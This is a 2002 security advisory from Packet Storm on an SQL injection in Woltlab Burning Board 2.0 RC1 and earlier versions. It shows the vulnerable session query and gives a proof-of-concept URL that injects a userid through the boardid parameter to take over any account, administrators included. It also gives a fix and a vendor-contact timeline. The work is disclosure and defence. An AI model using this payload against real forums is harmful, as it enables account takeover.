Type packetstorm
Reporter Cano2
Modified 2002-09-11T00:00:00


                                            `Subject: sql injection vulnerability in WBB 2.0 RC1 and below  
Date: Sep 8 2002 1:56PM  
Author: Cano2 <Cano2@buhaboard.de>  
I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1  
and below some weeks ago. The latest version (WBB 2.0 RC 2) seems not  
vulnerable, but there are still sites using vulnerable versiones.  
[versions tested vulnerable]  
WBB 2.0 RC 1  
WBB 2.0 beta 5  
WBB 2.0 beta 4  
WBB 2.0 beta 3  
It allows any user (even guests, may depend  
on configuration) to compromise every other account (Administrator  
one's too). It's caused by a variable containing unchecked userinput  
in board.php, which can be used for a sql injection attack.  
The query looks similar to the following:  
UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$HTTP_REQUEST_URI'',  
boardid =  
'$boardid', threadid = 'xx' WHERE hash = '$sid'  
Because the content of $boardid is not checked, it's possible to  
overwrite othe fields in the table.  
[proof of concept]  
board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is  
usually an admin]&sid=[attackers session-id]  
The executed query now looks like that:  
UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri =  
'board.php?boardid=[boardid]%27,%20userid=%27[gewünschte userid, 1 ist i.d.R immer  
admin]&sid=[session-id]', boardid = '[boardid]' userid='[gewünschte userid, 1 ist i.d.R immer  
threadid = 'xx' WHERE hash = '$sid'  
As you can see, the userid of the attackers session is overwritten  
with the victim one's.  
Update to the latest Version (WBB 2.0 RC2) or check every variable  
possibly containing userinput.  
$boardid = mysql_escape_string($boardid);  
[vendor status]  
29.7.02 contacted Woltlab  
12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable)  
I did't get an answer from Woltlab until now.